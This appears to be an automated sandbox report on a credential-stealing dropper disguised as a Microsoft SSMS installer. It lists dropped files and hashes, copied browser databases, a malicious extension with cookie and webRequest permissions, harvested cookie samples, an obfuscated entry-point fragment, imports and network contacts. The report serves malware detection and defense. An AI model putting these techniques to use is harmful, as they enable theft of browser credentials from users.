                                                                                                                                                            C:\Users\user\AppData\Local\Temp\ecv953D.tmp
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\1615173766196.exe
                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbb2860c6, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):26738688
                                                                                                                                                            Entropy (8bit):0.9917497007546038
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:guLv8uxfFUjdEP9iN17kOuTAPSEQoo+O3PX2BU:hUjdYiNpkOuM
                                                                                                                                                            MD5:851FF17C3F0015A652BFDA87CCD1ABA9
                                                                                                                                                            SHA1:4885EA1136CC64C056394454EAC8537B2FEB486B
                                                                                                                                                            SHA-256:F95B5E512DC3017D4FEAF335C1715391783C9B594B2F6BCC612E5F5CAB61955F
                                                                                                                                                            SHA-512:B7BB850ABDECD83CFD6D882E36026D87974276593F062E7C289B89A86C212D9C90DD5B9ADF11289A31F7586D4458D8F71101A5AEF7F67C2C3E4D729FD5F1726D
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\gdiview.msi
                                                                                                                                                            Process:C:\Users\user\Desktop\IpB8f8qwze.exe
                                                                                                                                                            File Type:;1033
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):237056
                                                                                                                                                            Entropy (8bit):6.262405449836627
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
                                                                                                                                                            MD5:7CC103F6FD70C6F3A2D2B9FCA0438182
                                                                                                                                                            SHA1:699BD8924A27516B405EA9A686604B53B4E23372
                                                                                                                                                            SHA-256:DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
                                                                                                                                                            SHA-512:92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\xldl.dat
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:7-zip archive data, version 0.3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1397922
                                                                                                                                                            Entropy (8bit):7.999863097294012
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
                                                                                                                                                            MD5:18C413810B2AC24D83CD1CDCAF49E5E1
                                                                                                                                                            SHA1:ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
                                                                                                                                                            SHA-256:9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
                                                                                                                                                            SHA-512:FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\xldl.dll
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):293320
                                                                                                                                                            Entropy (8bit):6.347427939821131
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
                                                                                                                                                            MD5:208662418974BCA6FAAB5C0CA6F7DEBF
                                                                                                                                                            SHA1:DB216FC36AB02E0B08BF343539793C96BA393CF1
                                                                                                                                                            SHA-256:A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
                                                                                                                                                            SHA-512:8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            C:\Users\user\AppData\Local\Web Data1615173777540
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):73728
                                                                                                                                                            Entropy (8bit):1.1874185457069584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\crx.7z
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:7-zip archive data, version 0.3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):36105
                                                                                                                                                            Entropy (8bit):7.994610469125073
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
                                                                                                                                                            MD5:DAFDD7237BA10D0C91295CD1C15749B2
                                                                                                                                                            SHA1:45D55EE145BC71921271BA5493F13D3428589D4D
                                                                                                                                                            SHA-256:B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
                                                                                                                                                            SHA-512:50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\crx.json
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1981
                                                                                                                                                            Entropy (8bit):5.365969892012237
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
                                                                                                                                                            MD5:B5CEED4A6FA3F501787DE10B4CB02EEE
                                                                                                                                                            SHA1:F09C0A8CA18D825D6CE6F192090EBD0659C7321B
                                                                                                                                                            SHA-256:749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
                                                                                                                                                            SHA-512:02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: {"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false
                                                                                                                                                            C:\Users\user\AppData\Localwebdata1615173777790
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):73728
                                                                                                                                                            Entropy (8bit):1.1874185457069584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Roaming\1615173766196.exe
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):103632
                                                                                                                                                            Entropy (8bit):6.404475911013687
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
                                                                                                                                                            MD5:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                            SHA1:B5EE276E8D479C270ECEB497606BD44EE09FF4B8
                                                                                                                                                            SHA-256:6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
                                                                                                                                                            SHA-512:EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Roaming\1615173766196.txt
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\1615173766196.exe
                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):30696
                                                                                                                                                            Entropy (8bit):3.716504685707176
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:b3I3K3CeQ3LE35d3qv9T3qZ3ogYd3J3KYEI6yB2ArMEYrxfelEnxYWM5j2j6hlkg:bYasIDQBc4gYdZ6YEIPLYdyMem6hlkSx
                                                                                                                                                            MD5:7483339EB59652ED25197A4E6CF8CEC7
                                                                                                                                                            SHA1:2559FAFB2A8C7C57D99AECE449E2095E7A1BCBD2
                                                                                                                                                            SHA-256:C691B4BE6B277DC74F9851C8A553227C0BAE56E663EE27751CC259686157DDFA
                                                                                                                                                            SHA-512:797C940274088AFF38F7F6606684597093E7159EBA337E1E6D758095C86AF4DC0ACDF1FE934CDDD42E17056023522D7A7F602BEAE0B8C55C64718F992439A25F
                                                                                                                                                            Malicious:false
Preview: [{"Modified Time":"6/27/2019 11:36:22 AM","Expire Time":"6/27/2019 12:06:23 PM","Host Name":"microsoft.com","Path":"/","Name":"MS0","Value":"9f5baa36e5b84d04a0cb382bf8328c82","Secure":"No","HTTP Only":"No","Host Only":"No","Entry ID":"6","Table Name":"CookieEntryEx_8"},{"Modified Time":"6/27/2019 11:36:22 AM","Expire Time":"6/26/2020 11:36:23 AM","Host Name":"microsoft.com","Path":"/","Name":"MC1","Value":"GUID=6132923ce07f4dd5916c7c5bc17cef89&HASH=61

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Entropy (8bit):7.9530465246504525
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                            File name:IpB8f8qwze.exe
                                                                                                                                                            File size:4882440
                                                                                                                                                            MD5:1b59fc1a89c1bc88ea4e1b26da579120
                                                                                                                                                            SHA1:6d1eb3583826aa70f437aba38beee8b787c2da7f
                                                                                                                                                            SHA256:6a9b454b620677ea11f4f69156969468b0f43ebdfe27dabfb0cf16572f9379eb
                                                                                                                                                            SHA512:9dcde0a9f29d4a68697b9fd2c167c5fc468c5c315b12e769a2f4fc72519996e6e8219fc9386e4e710cc88f12eb43973e79193bf6ef7c755d923f50889344e703
                                                                                                                                                            SSDEEP:98304:+PyrN2onLMeaojsO6QlbaRof/myjtFjhr/LS:+6hV4eDQO6QlWRoWyjt5hrG
                                                                                                                                                            File Content Preview:MZ......................@..................................................L.!This program cannot be run in DOS mode....$..........U..e...e...e.d1....e.d1....e.d1....e.......e.......e...d...e.70....e.70....e.......e.70....e.Rich..e.................PE..L..

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:51444454386c194d

                                                                                                                                                            Static PE Info

                                                                                                                                                            General

                                                                                                                                                            Entrypoint:0x4267a5
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:true
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                            Time Stamp:0x52974FC4 [Thu Nov 28 14:14:28 2013 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:5
                                                                                                                                                            OS Version Minor:1
                                                                                                                                                            File Version Major:5
                                                                                                                                                            File Version Minor:1
                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                            Subsystem Version Minor:1
                                                                                                                                                            Import Hash:67715e556e3a78ea78c756db800102a3

                                                                                                                                                            Authenticode Signature

                                                                                                                                                            Signature Valid:
                                                                                                                                                            Signature Issuer:
                                                                                                                                                            Signature Validation Error:
                                                                                                                                                            Error Number:
                                                                                                                                                            Not Before, Not After
                                                                                                                                                              Subject Chain
                                                                                                                                                                Version:
                                                                                                                                                                Thumbprint MD5:
                                                                                                                                                                Thumbprint SHA-1:
                                                                                                                                                                Thumbprint SHA-256:
                                                                                                                                                                Serial:

                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                Instruction
                                                                                                                                                                push ebp
                                                                                                                                                                mov ebp, esp
                                                                                                                                                                sub ebp, 18h
                                                                                                                                                                mov dword ptr [ebp-14h], 004267A5h
                                                                                                                                                                pushad
                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                                                pop ebx
                                                                                                                                                                cmp ebx, 04h
                                                                                                                                                                jne 00007F2D58A40CBEh
                                                                                                                                                                call edi
                                                                                                                                                                call esi
                                                                                                                                                                mov esp, ecx
                                                                                                                                                                mov edx, dword ptr [ebx]
                                                                                                                                                                mov esp, esi
                                                                                                                                                                mov ecx, dword ptr [esi]
                                                                                                                                                                popad
                                                                                                                                                                push 00000004h
                                                                                                                                                                pushad
                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                                                pop ebx
                                                                                                                                                                cmp ebx, 04h
                                                                                                                                                                jne 00007F2D58A40CBDh
                                                                                                                                                                mov ecx, dword ptr [edx]
                                                                                                                                                                mov ebx, dword ptr [esp]
                                                                                                                                                                mov ebp, esp
                                                                                                                                                                call ebp
                                                                                                                                                                mov eax, ecx
                                                                                                                                                                popad
                                                                                                                                                                mov eax, 00426B27h
                                                                                                                                                                pushad
                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                                                pop ebx
                                                                                                                                                                cmp ebx, 04h
                                                                                                                                                                jne 00007F2D58A40CC3h
                                                                                                                                                                mov esp, edi
                                                                                                                                                                popad
                                                                                                                                                                mov esi, edx
                                                                                                                                                                mov esi, ebp
                                                                                                                                                                call esi
                                                                                                                                                                mov eax, dword ptr [ebp+00h]
                                                                                                                                                                mov ecx, dword ptr [ebx]
                                                                                                                                                                mov ecx, eax
                                                                                                                                                                inc ebx
                                                                                                                                                                popad
                                                                                                                                                                push eax
                                                                                                                                                                pushad
                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                                                pop ebx
                                                                                                                                                                cmp ebx, 04h
                                                                                                                                                                jne 00007F2D58A40CC5h
                                                                                                                                                                mov eax, ecx
                                                                                                                                                                mov edi, ecx
                                                                                                                                                                mov eax, esi
                                                                                                                                                                mov edx, dword ptr [esi]
                                                                                                                                                                mov ecx, dword ptr [esp]
                                                                                                                                                                mov ecx, dword ptr [esp]
                                                                                                                                                                mov ebp, ecx
                                                                                                                                                                mov eax, dword ptr [esp]
                                                                                                                                                                popad
                                                                                                                                                                push 000013C5h
                                                                                                                                                                pushad
                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                                                pop ebx
                                                                                                                                                                cmp ebx, 04h
                                                                                                                                                                jne 00007F2D58A40CBBh
                                                                                                                                                                pop edx
                                                                                                                                                                mov edi, edx
                                                                                                                                                                mov edi, ebx
                                                                                                                                                                idiv ecx
                                                                                                                                                                inc dword ptr [ebx]
                                                                                                                                                                popad
                                                                                                                                                                push 0042735Bh
                                                                                                                                                                pushad
                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                                                pop ebx
                                                                                                                                                                cmp ebx, 04h
                                                                                                                                                                jne 00007F2D58A40CC2h

                                                                                                                                                                Rich Headers

                                                                                                                                                                Programming Language:
                                                                                                                                                                • [RES] VS2012 UPD1 build 51106
                                                                                                                                                                • [C++] VS2012 UPD1 build 51106
                                                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                • [LNK] VS2012 UPD1 build 51106

                                                                                                                                                                Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x54364          0x12c         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x5c000          0xa954        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x16ac70         0x2398
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x67000          0x3660        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x3b4f0          0x38          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x53cd0          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x53c88          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x3b000          0x474         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                                                                                Sections

Name      Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity   File Type  Entropy         Characteristics
.text     0x1000           0x395c4       0x39600   False     0.545394199346    data       6.59163014971   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata    0x3b000          0x1ac6e       0x1ae00   False     0.293968023256    data       4.98279190668   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data     0x56000          0x3074        0x1000    False     0.220947265625    data       2.65734870488   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.wixburn  0x5a000          0x38          0x200     False     0.109375          data       0.592250883662  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls      0x5b000          0x9           0x200     False     0.02734375        data       0.0             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc     0x5c000          0xa954        0xaa00    False     0.245909926471    data       4.45285297412   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc    0x67000          0x48e2        0x4a00    False     0.00216427364865  data       0.0             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                Resources

Name             RVA      Size    Type  Language  Country
RT_ICON          0x5c208  0x468   GLS_BINARY_LSB_FIRST  English  United States
RT_ICON          0x5c670  0x10a8  data  English  United States
RT_ICON          0x5d718  0x25a8  data  English  United States
RT_ICON          0x5fcc0  0x4228  dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0  English  United States
RT_MESSAGETABLE  0x63ee8  0x21d4  data  English  United States
RT_GROUP_ICON    0x660bc  0x3e    data  English  United States
RT_VERSION       0x660fc  0x3c0   data  English  United States
RT_MANIFEST      0x664bc  0x496   XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators  English  United States

Imports

DLL | Import
ADVAPI32.dll | OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegCloseKey, RegQueryValueExW, RegDeleteValueW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, OpenSCManagerW, OpenServiceW, QueryServiceStatus, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, RegOpenKeyExW, QueryServiceConfigW
USER32.dll | GetMessageW, PeekMessageW, PostMessageW, SetWindowLongW, PostQuitMessage, DispatchMessageW, DefWindowProcW, RegisterClassW, UnregisterClassW, CreateWindowExW, LoadCursorW, MessageBoxW, LoadBitmapW, TranslateMessage, GetWindowLongW, IsWindow, MsgWaitForMultipleObjects, WaitForInputIdle, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, GetCursorPos
OLEAUT32.dll | SysFreeString, SysAllocString, VariantInit, VariantClear
GDI32.dll | GetObjectW, StretchBlt, SelectObject, DeleteObject, CreateCompatibleDC, DeleteDC
SHELL32.dll | ShellExecuteExW, SHGetFolderPathW, CommandLineToArgvW
ole32.dll | CoTaskMemFree, CoInitializeSecurity, CLSIDFromProgID, CoCreateInstance, StringFromGUID2, CoInitialize, CoInitializeEx, CoUninitialize
KERNEL32.dll | GetVersionExW, CompareStringW, VerSetConditionMask, FreeLibrary, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, lstrlenW, GetModuleHandleExW, GetSystemDirectoryW, GetTempPathW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetComputerNameW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ExpandEnvironmentStringsW, GetFileAttributesW, ReadFile, SetFilePointerEx, CreateFileW, InterlockedExchange, InterlockedCompareExchange, LoadLibraryW, lstrlenA, RemoveDirectoryW, CreateEventW, OutputDebugStringW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, WriteFile, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, FindClose, SetFileAttributesW, FindFirstFileW, FindNextFileW, GetModuleHandleW, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, DuplicateHandle, CreateProcessW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, ResetEvent, SetEndOfFile, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CreateFileA, CompareStringA, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, VirtualAlloc, VirtualFree, GetSystemTimeAsFileTime, DeleteFileW, GetThreadLocale, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, CloseHandle, Sleep, ReleaseMutex, DeleteCriticalSection, InitializeCriticalSection, GetLastError, GetTimeZoneInformation, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, HeapFree, RaiseException, HeapAlloc, IsProcessorFeaturePresent, IsDebuggerPresent, TerminateProcess, SystemTimeToTzSpecificLocalTime, SystemTimeToFileTime, MoveFileExW, CopyFileW, RtlUnwind, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCurrentThreadId, GetCurrentProcess, LocalFree, HeapSetInformation, LoadLibraryExW, SetEvent, HeapReAlloc, HeapSize, LCMapStringW, SetStdHandle, WriteConsoleW, FlushFileBuffers, SetFilePointer, GetLocalTime, FormatMessageW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, GetModuleHandleA, GlobalAlloc, GetCurrentProcessId, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetStartupInfoW, InitializeCriticalSectionAndSpinCount, GetFileType, GetProcessHeap, GetModuleFileNameW, GetStdHandle, GetFileSizeEx, MultiByteToWideChar, ExitProcess, DecodePointer, GetCommandLineW, SetLastError, EncodePointer, GlobalFree
Cabinet.dll |
CRYPT32.dll | CertGetCertificateContextProperty, CryptHashPublicKeyInfo
msi.dll |
RPCRT4.dll | UuidCreate
WININET.dll | HttpQueryInfoW, InternetOpenW, InternetCloseHandle, InternetConnectW, InternetReadFile, InternetSetOptionW, HttpOpenRequestW, HttpAddRequestHeadersW, HttpSendRequestW, InternetErrorDlg, InternetCrackUrlW
WINTRUST.dll | WTHelperGetProvSignerFromChain, CryptCATAdminCalcHashFromFileHandle, WTHelperProvDataFromStateData, WinVerifyTrust
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW

Version Infos

Description | Data
LegalCopyright | Copyright (c) Microsoft Corporation. All rights reserved.
InternalName | setup
FileVersion | 15.0.18358.0
CompanyName | Microsoft Corporation
ProductName | Microsoft SQL Server Management Studio - 18.7.1
ProductVersion | 15.0.18358.0
FileDescription | Microsoft SQL Server Management Studio - 18.7.1
OriginalFilename | SSMS-Setup-ENU.exe
Translation | 0x0409 0x04e4

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                Mar 7, 2021 19:21:26.896104097 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:26.944283009 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.944304943 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.950754881 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.950779915 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.950814962 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.950838089 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.950851917 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:26.950875044 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:26.950927019 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:27.087616920 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:27.087721109 CET4972380192.168.2.5172.67.134.157
                                                                                                                                                                Mar 7, 2021 19:21:27.136095047 CET8049723172.67.134.157192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:27.136147976 CET8049723172.67.134.157192.168.2.5
